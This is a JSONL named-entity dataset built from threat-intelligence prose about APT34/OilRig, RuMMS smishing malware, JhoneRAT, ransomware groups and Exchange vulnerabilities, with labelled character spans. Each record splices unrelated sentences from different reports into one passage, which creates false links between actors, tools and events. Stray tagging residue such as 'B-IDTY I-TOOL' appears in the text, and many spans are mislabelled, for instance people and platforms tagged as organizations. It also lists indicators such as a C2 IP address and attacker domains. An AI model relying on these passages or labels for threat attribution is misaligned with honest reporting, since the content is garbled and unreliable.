{"text": "ussd : to call a C2-specified phone number . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics . The campaign shows an actor that developed a homemade RAT that works in multiple layers hosted on cloud providers . There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 65, "end": 92, "label": "System"}, {"start": 144, "end": 164, "label": "System"}, {"start": 377, "end": 385, "label": "Organization"}, {"start": 422, "end": 444, "label": "Organization"}, {"start": 492, "end": 506, "label": "Organization"}]}
{"text": "Figure 5 . We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 . JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware . In that campaign , the attackers also targeted the government of a Middle Eastern country , a multinational electronics manufacturer , and a hospital in Southeast Asia .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 212, "end": 220, "label": "Malware"}, {"start": 237, "end": 243, "label": "System"}, {"start": 341, "end": 349, "label": "Organization"}, {"start": 384, "end": 422, "label": "Organization"}, {"start": 427, "end": 465, "label": "Organization"}, {"start": 474, "end": 500, "label": "Organization"}]}
{"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware . The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 207, "end": 212, "label": "Organization"}, {"start": 289, "end": 303, "label": "System"}, {"start": 511, "end": 537, "label": "Organization"}, {"start": 540, "end": 556, "label": "Organization"}, {"start": 561, "end": 572, "label": "Organization"}, {"start": 586, "end": 659, "label": "Organization"}]}
{"text": "Note that inside this single response , there is one \u201c install_true \u201d command , one \u201c sms_grab \u201d command and four \u201c sms_send \u201d commands . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware . Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet . It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 216, "end": 241, "label": "System"}, {"start": 255, "end": 263, "label": "System"}, {"start": 341, "end": 352, "label": "System"}, {"start": 552, "end": 559, "label": "Malware"}, {"start": 617, "end": 635, "label": "Organization"}, {"start": 670, "end": 696, "label": "Organization"}, {"start": 718, "end": 723, "label": "Organization"}]}
{"text": "With the four \u201c sms_send \u201d commands , the messages as specified in the key \u201c text \u201d will be sent immediately to the specified short numbers . APT34 loosely aligns with public reporting related to the group \" OilRig \" . For this campaign , the attacker chose to use a cloud provider ( Google ) with a good reputation to avoid URL blacklisting . In the USA , Vice Society is the most active among a group of gangs .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 284, "end": 290, "label": "System"}, {"start": 357, "end": 369, "label": "Organization"}]}
{"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . The malware is divided into a couple of layers \u2014 each layer downloads a new payload on a cloud provider to get the final RAT developed in python and that uses additional providers such as Twitter and ImgBB . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 207, "end": 216, "label": "Malware"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 369, "end": 372, "label": "System"}, {"start": 386, "end": 392, "label": "System"}, {"start": 436, "end": 443, "label": "System"}, {"start": 448, "end": 453, "label": "System"}, {"start": 460, "end": 470, "label": "Organization"}, {"start": 534, "end": 538, "label": "Organization"}, {"start": 545, "end": 569, "label": "Organization"}, {"start": 595, "end": 603, "label": "Organization"}]}
{"text": "Figure 6 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . \u201d", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 64, "end": 94, "label": "Vulnerability"}, {"start": 95, "end": 109, "label": "Vulnerability"}, {"start": 120, "end": 128, "label": "System"}, {"start": 133, "end": 144, "label": "System"}, {"start": 152, "end": 155, "label": "System"}, {"start": 373, "end": 390, "label": "Organization"}]}
{"text": "Example Response in JSON format In particular , short number \u201c +7494 \u201d is associated with a payment service provider in Russia . The vulnerability was patched by Microsoft on Nov 14 , 2017 . In this campaign , focusing detection of the network is not the best approach . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 162, "end": 171, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 326, "end": 340, "label": "Organization"}]}
{"text": "The provider \u2019 s website described how the code 7494 can be used to provide a series of payment-related capabilities . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Instead , the detection must be based on the behaviour on the operating system . For this reason it is important to note that some organizations and systems may simply be convenient targets which enable and facilitate attackers actions .", "spans": [{"start": 155, "end": 170, "label": "System"}, {"start": 173, "end": 185, "label": "Malware"}, {"start": 238, "end": 279, "label": "Malware"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 431, "end": 438, "label": "Organization"}]}
{"text": "For example , sending text \u201c Balance \u201d will trigger a response with the victim \u2019 s wallet balance . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection . To boot , there was a 75 percent increase in the average number of monthly attacks in the US between the first and second half of the last 12 months .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 243, "end": 257, "label": "Vulnerability"}, {"start": 325, "end": 351, "label": "System"}, {"start": 430, "end": 473, "label": "Indicator"}, {"start": 477, "end": 492, "label": "Organization"}, {"start": 503, "end": 558, "label": "Indicator"}]}
{"text": "Sending text \u201c confirm 1 \u201d will include proof of payment . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . The fact that this attacker decided to leverage cloud services and four different services \u2014 and not their own infrastructure \u2014 is smart from an opsec point of view . Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns ) .", "spans": [{"start": 63, "end": 75, "label": "Organization"}, {"start": 82, "end": 87, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 134, "end": 143, "label": "Organization"}, {"start": 240, "end": 254, "label": "System"}, {"start": 259, "end": 282, "label": "System"}, {"start": 468, "end": 526, "label": "Indicator"}, {"start": 532, "end": 572, "label": "Indicator"}]}
{"text": "Sending text \u201c call on \u201d will activate the USSD payment confirmation service . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region . It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure . Mandiant has observed UNC2970 , APT43 , and UNC4899 all utilize similar infrastructure .", "spans": [{"start": 89, "end": 94, "label": "Organization"}, {"start": 348, "end": 414, "label": "Indicator"}]}
{"text": "During our investigation , we observed the C2 server sending multiple \u201c balance \u201d commands to different institutions , presumably to query the victim \u2019 s financial account balances . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender . Indicators of attack are similar to IOCs , but rather than focusing on forensic analysis of a compromise that has already taken place , indicators of attack focus on identifying attacker activity while an attack is in process .", "spans": [{"start": 187, "end": 199, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 214, "end": 226, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 360, "end": 365, "label": "Indicator"}, {"start": 506, "end": 510, "label": "Indicator"}, {"start": 541, "end": 603, "label": "Indicator"}]}
{"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider \u2019 s payment service . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame . It is not the first time an attacker used only cloud providers . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 384, "end": 399, "label": "System"}, {"start": 431, "end": 471, "label": "Vulnerability"}]}
{"text": "These could include resetting the user \u2019 s PIN , enabling or disabling various alerts and confirmations , and confirming the user \u2019 s identity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East . Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 173, "end": 180, "label": "Organization"}, {"start": 214, "end": 226, "label": "Organization"}, {"start": 257, "end": 274, "label": "Organization"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 590, "end": 662, "label": "Indicator"}]}
{"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented . We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers . Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 207, "end": 229, "label": "System"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 360, "end": 366, "label": "Malware"}, {"start": 431, "end": 439, "label": "Organization"}, {"start": 556, "end": 578, "label": "Organization"}]}
{"text": "Figure 7 lists the IP addresses of these C2 servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye . The attacker implemented filtering based on the keyboard 's layout . We 'll delve into the recent four - month spike in attacks against the UK , the unsettling uptick in attacks on France 's government sector , and how Germany retained its spot as the fourth most targeted country in the world .", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 243, "end": 262, "label": "System"}, {"start": 270, "end": 279, "label": "System"}, {"start": 307, "end": 319, "label": "Organization"}, {"start": 328, "end": 351, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 506, "end": 508, "label": "Organization"}, {"start": 547, "end": 574, "label": "Organization"}, {"start": 585, "end": 592, "label": "Organization"}]}
{"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": [{"start": 79, "end": 90, "label": "Indicator"}, {"start": 179, "end": 191, "label": "Organization"}, {"start": 201, "end": 218, "label": "System"}, {"start": 281, "end": 299, "label": "System"}, {"start": 386, "end": 395, "label": "Organization"}]}
{"text": "Figure 7 . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East . ' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . ' 3001 ' : Lebanon . But , IOCs are not always easy to detect they can be as simple as metadata elements or incredibly complex malicious code and content samples .", "spans": [{"start": 100, "end": 117, "label": "Organization"}, {"start": 491, "end": 508, "label": "Indicator"}, {"start": 512, "end": 565, "label": "Indicator"}]}
{"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed . This latest attack consisted of three waves between May and June 2018 . We identified three malicious Microsoft Office B-IDTY I-TOOL documents that download and load an additional Office document with a Macro . \u201c And his access was never shut off until today ? , \u201d asked the company \u2019s general counsel Mike Dacks .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 274, "end": 283, "label": "System"}, {"start": 375, "end": 380, "label": "System"}, {"start": 447, "end": 473, "label": "Organization"}, {"start": 474, "end": 484, "label": "Organization"}]}
{"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent.docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix \u2019s publication .", "spans": [{"start": 82, "end": 87, "label": "Malware"}, {"start": 167, "end": 172, "label": "Malware"}, {"start": 184, "end": 196, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 314, "end": 325, "label": "Indicator"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 354, "end": 377, "label": "Vulnerability"}]}
{"text": "The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East . The author of the document asks to enable editing in English and in Arabic . Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": [{"start": 125, "end": 130, "label": "Organization"}]}
{"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the \u201c y \u201d axis . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 116, "end": 128, "label": "Organization"}, {"start": 202, "end": 211, "label": "Organization"}, {"start": 214, "end": 224, "label": "Organization"}, {"start": 227, "end": 233, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 333, "end": 340, "label": "Indicator"}, {"start": 398, "end": 406, "label": "System"}]}
{"text": "The dates on the \u201c x \u201d axis show the dates when we first saw these apps in the wild . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 . The more recent document is from mid-January and alleged to be from a United Arab Emirate organization . Babuk , a Russian ransomware group that emerged in 2021 , has conducted a series of high - profile ransomware attacks across various industries , including government , healthcare , logistics , and professional services .", "spans": [{"start": 111, "end": 130, "label": "Organization"}, {"start": 175, "end": 209, "label": "Organization"}, {"start": 280, "end": 292, "label": "Organization"}, {"start": 590, "end": 600, "label": "Organization"}, {"start": 613, "end": 623, "label": "Organization"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 639, "end": 648, "label": "Organization"}, {"start": 655, "end": 676, "label": "Organization"}]}
{"text": "This figure demonstrates the following interesting information : The time range when threat actors distributed RuMMS on those shared-hosting websites is from January 2016 to March 2016 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . The author blurred the content and asks the user to enable editing to see the content . Legacy Task Name QcWBX Command to Run C:\\Windows\\msserver.exe", "spans": [{"start": 111, "end": 116, "label": "Malware"}, {"start": 232, "end": 244, "label": "Organization"}, {"start": 291, "end": 309, "label": "Organization"}, {"start": 346, "end": 371, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 519, "end": 542, "label": "Indicator"}]}
{"text": "Threat actors used different websites to host different payloads at different times . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East . In the three documents , an additional Office document containing a Macro is downloaded and executed . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 108, "end": 115, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 175, "end": 191, "label": "Organization"}, {"start": 258, "end": 273, "label": "System"}, {"start": 287, "end": 292, "label": "System"}, {"start": 440, "end": 456, "label": "Vulnerability"}]}
{"text": "This kind of \u201c moving target \u201d behavior made it harder to track their actions . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics . The documents are located on Google Drive . Malwarebytes found that a total of 48 separate ransomware groups attacked the US in the observed period .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 100, "end": 127, "label": "System"}, {"start": 179, "end": 199, "label": "System"}, {"start": 310, "end": 322, "label": "System"}, {"start": 325, "end": 337, "label": "Organization"}, {"start": 349, "end": 428, "label": "Indicator"}]}
{"text": "The same websites have hosted different RuMMS samples at different dates . Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution . The template located on Google Drive contains a macro . On multiple systems , XPdb entries for the malware contained the parent process of the JumpCloud agent , further evidence that the threat actor leveraged JumpCloud to gain initial access to victim environments .", "spans": [{"start": 40, "end": 45, "label": "Malware"}, {"start": 165, "end": 186, "label": "Organization"}, {"start": 213, "end": 225, "label": "System"}, {"start": 237, "end": 242, "label": "System"}, {"start": 267, "end": 271, "label": "System"}]}
{"text": "C2 servers are shared by multiple samples . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment . This is consistent with the group \u2019s prior activity scanning and exploiting internet facing servers for initial access .", "spans": [{"start": 87, "end": 117, "label": "Malware"}, {"start": 155, "end": 161, "label": "Organization"}]}
{"text": "This matches our observations of C2 servers as shown in Figure 7 . However , the attack on January 16 did not involve ThreeDollars at all . Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 118, "end": 130, "label": "System"}, {"start": 154, "end": 157, "label": "System"}, {"start": 244, "end": 258, "label": "Organization"}, {"start": 295, "end": 310, "label": "Organization"}, {"start": 402, "end": 417, "label": "Organization"}]}
{"text": "Figure 8 . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 . A WMIC command is executed to get this information on the targeted system . Mandiant identified sh3.exe as a utility suspected to run the Mimikatz LSADUMP command .", "spans": [{"start": 111, "end": 123, "label": "Organization"}, {"start": 155, "end": 159, "label": "System"}, {"start": 249, "end": 256, "label": "System"}]}
{"text": "RuMMS samples , hosting sites , C2 servers from Jan. 2016 to Mar . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email . If a serial number exists , the rest of the code is executed . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 77, "end": 83, "label": "Organization"}, {"start": 118, "end": 131, "label": "System"}, {"start": 273, "end": 305, "label": "Organization"}, {"start": 433, "end": 456, "label": "Organization"}]}
{"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 . The purpose is to download an image from a new Google Drive link . These types of threat actors will be attempting to cause the most embarrassment andor pain to prove the company can not function without them .", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 158, "end": 163, "label": "Malware"}]}
{"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East . It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 29, "end": 34, "label": "Malware"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 114, "end": 126, "label": "Organization"}, {"start": 200, "end": 216, "label": "Organization"}, {"start": 436, "end": 462, "label": "System"}, {"start": 465, "end": 474, "label": "Organization"}]}
{"text": "When we first observed the malware in January , we recorded 380 infections . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 117, "end": 139, "label": "Malware"}, {"start": 163, "end": 177, "label": "System"}, {"start": 199, "end": 211, "label": "System"}, {"start": 235, "end": 246, "label": "Indicator"}, {"start": 250, "end": 257, "label": "Indicator"}, {"start": 261, "end": 270, "label": "Indicator"}, {"start": 326, "end": 342, "label": "Vulnerability"}, {"start": 417, "end": 433, "label": "Vulnerability"}]}
{"text": "In February , we recorded 767 infections . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic . The image file is a real image with a base64-encoded binary appended at the end . Better yet , reach out to us , and well be pleased to share a customized demonstration of the ThreatConnect Platform .", "spans": [{"start": 161, "end": 167, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 471, "end": 495, "label": "System"}]}
{"text": "In March , it peaked at 1,169 infections . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . The malware author has a curious sense of humor . Ways our customers can detect and block this threat are listed below .", "spans": [{"start": 80, "end": 92, "label": "System"}, {"start": 152, "end": 167, "label": "Malware"}]}
{"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro . The base64 data and image are separated by the \" **** \" string . School budgets are tight and institutions are understandably keen to direct their budgets at things that directly benefit pupils .", "spans": [{"start": 62, "end": 67, "label": "Malware"}, {"start": 96, "end": 108, "label": "System"}, {"start": 441, "end": 453, "label": "Organization"}]}
{"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group . The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 89, "end": 94, "label": "Malware"}, {"start": 236, "end": 248, "label": "Organization"}]}
{"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc.exe or chrome.exe or winrar.exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": [{"start": 102, "end": 108, "label": "Organization"}, {"start": 124, "end": 132, "label": "Indicator"}, {"start": 136, "end": 146, "label": "Indicator"}, {"start": 150, "end": 160, "label": "Indicator"}, {"start": 163, "end": 187, "label": "Indicator"}]}
{"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks . The decoded base64 data is an AutoIT binary . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 148, "end": 160, "label": "Organization"}, {"start": 171, "end": 192, "label": "System"}, {"start": 197, "end": 217, "label": "System"}, {"start": 229, "end": 246, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 423, "end": 463, "label": "System"}, {"start": 521, "end": 529, "label": "System"}]}
{"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 . This binary downloads a new file on Google Drive . We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 231, "end": 237, "label": "Organization"}, {"start": 337, "end": 349, "label": "System"}, {"start": 398, "end": 424, "label": "Organization"}, {"start": 433, "end": 445, "label": "Organization"}]}
{"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor \u2019 s campaign and makes it harder for defending parties to track these moving targets . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 257, "end": 278, "label": "Malware"}, {"start": 455, "end": 462, "label": "Organization"}, {"start": 509, "end": 525, "label": "Organization"}, {"start": 595, "end": 599, "label": "Organization"}]}
{"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat . The OilRig group continues to remain a highly active adversary in the Middle East region . The final payload is a remote access tool ( RAT ) written in python . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 14, "end": 46, "label": "System"}, {"start": 127, "end": 132, "label": "Malware"}, {"start": 189, "end": 201, "label": "Organization"}, {"start": 299, "end": 317, "label": "System"}, {"start": 320, "end": 323, "label": "System"}, {"start": 337, "end": 343, "label": "System"}, {"start": 364, "end": 380, "label": "System"}, {"start": 420, "end": 436, "label": "System"}, {"start": 526, "end": 539, "label": "System"}]}
{"text": "To protect yourself from these threats , FireEye suggests that users : Take caution before clicking any links where you are not sure about the origin . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 . We named this RAT \" JhoneRAT \" . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 224, "end": 232, "label": "Organization"}, {"start": 264, "end": 267, "label": "System"}, {"start": 270, "end": 278, "label": "Malware"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 326, "end": 354, "label": "Organization"}, {"start": 374, "end": 429, "label": "Organization"}]}
{"text": "Don \u2019 t install apps outside the official app store . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The python code is wrapped into an executable using pyinstaller . The commandline parameters m and h are mutually exclusive .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 125, "end": 134, "label": "Organization"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 150, "end": 156, "label": "Organization"}, {"start": 159, "end": 167, "label": "Organization"}, {"start": 170, "end": 188, "label": "Organization"}, {"start": 216, "end": 222, "label": "System"}, {"start": 278, "end": 335, "label": "Indicator"}]}
{"text": "Exodus : New Android Spyware Made in Italy Mar 29 Summary We identified a new Android spyware platform we named Exodus , which is composed of two stages we call Exodus One and Exodus Two . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 . It uses minimal obfuscation applied only on variables and function naming . In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 13, "end": 20, "label": "System"}, {"start": 78, "end": 85, "label": "System"}, {"start": 112, "end": 118, "label": "Malware"}, {"start": 161, "end": 171, "label": "Malware"}, {"start": 176, "end": 186, "label": "Malware"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 238, "end": 244, "label": "Organization"}, {"start": 249, "end": 273, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 342, "end": 347, "label": "Organization"}, {"start": 487, "end": 491, "label": "Organization"}]}
{"text": "We have collected numerous samples spanning from 2016 to early 2019 . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government . The RAT starts by launching three threads . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 192, "end": 199, "label": "Organization"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 268, "end": 271, "label": "System"}]}
